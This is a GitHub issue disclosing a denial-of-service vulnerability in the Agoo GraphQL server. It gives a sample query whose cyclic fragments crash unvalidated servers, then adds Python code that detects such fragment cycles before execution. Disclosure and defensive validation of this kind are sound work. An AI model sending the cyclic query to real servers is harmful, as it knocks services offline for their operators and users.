
Agoo Fragment Cycle Security Vulnerability #109

Closed
@nicholasaleks

Description

Agoo currently does not support request validation, meaning cyclic fragment requests lead to unbounded results, causing instances of Agoo to crash.

Sample exploit script:

```graphql
query test {
  __schema {
    ...A
  }
}

fragment A on __Schema {
  types {
    fields {
      name
    }
  }
  ...B
}

fragment B on __Schema {
  ...A
}
```

For more information see: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/agoo.md

Spec ref: https://spec.graphql.org/October2021/#sec-Fragment-spreads-must-not-form-cycles
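Cycle detection as the linked spec rule describes it, added here as an example (not Agoo's own code): a Python check that builds the fragment-spread graph of a document and reports the closed cycle, using a simplified regular-expression scan instead of a real GraphQL parser, with the issue's query embedded as a constructed sample.

```python
import re

# Constructed sample documents: the cyclic query from this issue and an acyclic variant.
CYCLIC_QUERY = """query test { __schema { ...A } }
fragment A on __Schema { types { fields { name } } ...B }
fragment B on __Schema { ...A }"""
ACYCLIC_QUERY = """query test { __schema { ...A } }
fragment A on __Schema { ...B }
fragment B on __Schema { types { name } }"""

FRAGMENT_DEF = re.compile(r"\bfragment\s+(\w+)\s+on\s+\w+\s*\{")
SPREAD = re.compile(r"\.\.\.\s*(\w+)")


def fragment_graph(doc):
    """Map each fragment name to the named spreads inside its body. Simplified text
    scan, not a GraphQL parser: a body runs until the next 'fragment' keyword and
    inline fragments ('... on T') are dropped because they are not spreads."""
    defs = list(FRAGMENT_DEF.finditer(doc))
    graph = {}
    for i, m in enumerate(defs):
        end = defs[i + 1].start() if i + 1 < len(defs) else len(doc)
        spreads = SPREAD.findall(doc[m.end():end])
        graph[m.group(1)] = [s for s in spreads if s != "on"]
    return graph


def find_fragment_cycle(graph):
    """Return the fragments on a spread cycle, closed (e.g. ['A', 'B', 'A']), or []
    if none: the 'Fragment spreads must not form cycles' rule as a DFS that tracks
    the current path. Spreads of undefined fragments are skipped (separate rule)."""
    visited, path = set(), []

    def visit(name):
        if name in path:                      # back edge: the path closes a cycle
            return path[path.index(name):] + [name]
        if name in visited or name not in graph:
            return []
        visited.add(name)
        path.append(name)
        for target in graph[name]:
            cycle = visit(target)
            if cycle:
                return cycle
        path.pop()
        return []

    for name in graph:
        cycle = visit(name)
        if cycle:
            return cycle
    return []
```

A server that runs this check before execution rejects the document above with the cycle `A -> B -> A` instead of recursing into it.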
